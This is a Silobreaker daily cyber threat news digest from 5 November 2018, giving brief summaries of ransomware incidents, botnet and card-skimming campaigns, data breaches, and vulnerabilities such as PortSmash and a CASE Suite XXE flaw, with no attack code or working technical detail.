Threat Reports

Silobreaker Daily Cyber Digest – 05 November 2018

 

Malware

ESC Corporate Services targeted by ransomware  

  • Toronto-based ESC Corporate Services, a licensed government provider of access to government records and government registration and filing services, has been hit by a ransomware attack. The attack was first detected on October 25th, 2018.
  • The data affected includes corporation records, names, addresses, and registration of liens for automobile, boat and equipment leases.

Source

 

New ransomware discovered installing DiskCryptor

  • The ransomware installs DiskCryptor and reboots the computer. Victims are then sent a ransom note that states that their disk is being encrypted and how they can pay the ransom. DiskCryptor encrypts the whole disk and then prompts the user to enter a password on reboot.
  • MalwareHunterTeam has observed that the ransomware is being run manually or is being called by another script, because it requires an argument to be passed to the program, which is used by the password for DiskCryptor. There is also a possibility that the threat actors are hacking into the Remote Desktop Services and installing the ransomware manually.

Source

 

Ongoing Campaigns

F Secure observe new spam campaign targeting Mac users that use Exodus

  • The spam email contains an attachment called ‘Exodus-MacOS-1.64.1-update[.]zip’ that attempts to deliver a fake Exodus update using the subject line ‘Update 1.64.1 Release – New Assets and more’.
  • The attached archive leads to an application that contains a mach-O binary with the filename ‘rtcfg’. Analysis of the strings showed references to the ‘relatime-spy-mac[.]com’ website which provides a cloud-based surveillance and remote spy tool. The spy tool supports Windows as well as Mac.

Source

 

Trinity and FBot botnets competing for control over unsecured Android devices

  • The Trinity and FBot botnets are in direct competition for the control over unsecured Android devices. In particular devices that have an exposed diagnostic port 5555 are affected. The port hosts a standard Android feature called Android Debug Bridge (ADB).
  • The Trinity botnet uses the access to plant a cryptominer onto the affected device. The purpose of the Fbot botnet remains unknown, however, FBot was found to contain special code designed to search for Trinity’s file names and remove it.

Source

 

Hacker groups increasingly use log file destruction to hide their attacks

  • Carbon Black released a report on 113 investigations its incident response partners had performed detailing how cyber attacks carried out by nation-state actors were increasingly destroying log data, antivirus logs, and security logs in order to make it more difficult for Incident Response teams to access and investigate data.

Source

 

Security researcher analyses compromised e-commerce websites

  • Researcher Brian Krebs has released in-depth analysis of compromised websites and the methods attackers use to place tiny snippets of malicious code that invoke hostile domains onto the targeted sites.
  • Krebs provides an example of card-skimming code being placed on asianfoodgrocer[.]com, hosted on the zoobashop[.]com domain. Zoobashop was discovered to be a currently hacked e-commerce site based in Ghana, that servers a tiny obfuscated script named js[.]js, stealing data submitted into online forms.
  • Other examples include setting up malicious domains that mimic the original host domain, for example bargainjunkie[.]com was mimicked by barganljunkie[.]com.

Source  

 

Leaks and Breaches

Magecart malware steals Kitronik’s customers’ data

  • The website of Kitronik, an educational electronics provider, has been compromised by the Magecart malware. According to the company, the malware was present on their website between August and September 2018.
  • The data breached includes customer names, emails, card numbers, card expiry dates, CVVs and postal addresses. A company spokesman has stated that customers who had set up their account prior to August 2018 are likely to not have been affected.
  • It is unclear how many individuals were affected by the breach.

Source

 

Hackers steal documents on French nuclear power plants and prisons

  • German and French media reported that hackers stole over 11,000 sensitive files pertaining to high-security prison video camera locations, a planned nuclear-waste dump, and to a thousand employees of the French firm Ingerop.

Source

 

Data leak of Moscow internet provider Akado Telecom affects thousands of wealthy residents

  • Customers’ personal data including names, home addresses and mobile phone numbers were exposed on an international not-for-profit internet registry database.
  • Reuters observed the exposed personal data of prominent Russian individuals including a government official, a film director and a businessman.  

Source

 

Vulnerabilities

New Microsoft Edge browser zero-day remote code execution exploit discovered

  • Researchers announced on Twitter on Wednesday that they had compromised Microsoft Edge, with proof in the format of an image that displayed a web browser appearing to launch the Windows Calculator app.
  • Researchers Yushi Liang and Alexander Kochkov are working on developing a stable exploit and attaining full sandbox escaping of the code. They were also looking for a method to escalate execution privileges to SYSTEM to gain full control of the machine.

Source

 

New PortSmash side-channel vulnerability discovered

  • PortSmash uses a timing attack to steal information from other processes running in the same CPU core with SMT/hyperthreading enabled. Researchers testing this attack were able to steal the private decryption key from an OpenSSL thread running in the same core as their exploit.
  • The Portsmash vulnerability was discovered by researchers from the Tampere University of Technology in Finland and the Universidad Tecnologica de la Habana in Cuba. Their research has been submitted in the paper ‘Port Contention for Fun and Profit’.

Source 1 Source 2

 

Serious vulnerability found in CASE Suite software

  • Researcher Gjoko Krstic discovered a high severity vulnerability, tracked as CVE-2018-17912, in the building automation software CASE Suite sold by Swiss-based FR. Sauter AG. The flaw affects CASE Suite versions 3.10 and earlier.  
  • The vulnerability is an XML external entity (XXE) bug ‘using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via [an] out-of-band (OOB) attack’.
  • An attacker can exploit the vulnerability to steal files from the compromised device, including configuration data, personal information, account credentials and details about the system and the network housing it. The flaw has since been patched.

Source

 

Research from University of California suggests ‘sniffing’ attacks can reveal browser history

  • Modern browsers such as Chrome, Firefox and Edge have vulnerabilities that allow malicious websites to extract thousands of URLs in a user’s web history. The vulnerabilities are reportedly built into the way these browsers structure links, which means that major structural changes would have to take place to fix them.
  • Tor was the only browser immune to these attacks, due to it not keeping track of a user’s internet history.
  • Lead research Michael Smith stated that fixes would take several months to a year to implement.

Source

 

Domain name EasyDNS admits to accidentally leaking contact details

  • The leak affected 1,500 domain owners in Whois query results for just over 24 hours. The records include names, phone numbers, email addresses and postal addresses, which should have remained private in Whois searches.
  • The information was reportedly exposed by a bug in the system that was provided by Tucows, which is used by EasyDNS in its backend to manage domain names. On October 25th Tucows deployed some new components that contained the software bug.

Source

 

General News

News apps and apps for children found to contain largest amount of third-party trackers

  • Researchers from the University of Oxford studied nearly one million Android apps on the UK and US Google Play Store to find that 90% of them contain at least one third-party tracker. Their findings also reveal that specifically news apps and apps targeted at children contain the highest numbers of trackers.

Source

 

Brian Kemp’s office launches investigation into alleged hacking attempt by Democratic Party

  • Secretary of State Brian Kemp’s office has stated that they will be investigating the Democratic Party in relation to an alleged attempt to hack Georgia’s online voter database.
  • The alleged hacking altered voters’ information or removed them from the registered voter list altogether. So far, no evidence has been provided in support of the claim.

Source

 

Former CIA employee reportedly leaked national defense materials from prison

  • Joshua Adam Schulte was originally arrested for leaking information on the CIA’s hacking tools to Wikileaks, that he stole in 2016 when he was working for the CIA. Federal prosecutors recently issued another indictment against Schulte, claiming he attempted to keep leaking information from prison, including classified information and search warrant materials.

Source

 

Twitter deletes 10,000 bot accounts discouraging people from voting in US midterms

  • Twitter deleted the accounts, which falsely appeared to be issued by the Democratic Party. The Democratic Congressional Campaign Committee campaigned to get the fraudulent accounts deleted as part of its response to the bots spreading fake and negative information on the 2016 Democratic presidential candidate Hillary Clinton.

Source

 

Ransomware bundles sold on dark web for cut prices

  • Samsam ransomware is reportedly included in the 23 ransomware bundle, as well as other variants such as Magniber, Satan, CryBrazil and XiaoBa. The bundle was discovered by security firm Sixgill for $750 and also includes tutorials and instructions on how to use the ransomware, and how to exploit vulnerabilities such as the EternalBlue.

Source

 

The Silobreaker Team

Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

More News

  • Silobreaker Daily Cyber Digest – 22 March 2019

      Ongoing Campaigns Dr Web reports Flexnet banking trojan targeting users of Android devices Flexnet banking trojan is reportedly based on GM bot trojan...
  • Silobreaker Daily Cyber Digest – 21 March 2019

      Malware New Carbanak Gang tools discovered by Flashpoint Flashpoint researchers reported on newly discovered tools used by the Carbanak Gang in a campaign...
  • Silobreaker Daily Cyber Digest – 20 March 2019

      Malware Malicious Office document analysed by ZLAB Researchers at Cybaze-Yoroi ZLAB discovered a malicious Office document with a payload capable of bypassing AppLocker...
View all News

Request a demo

Get in touch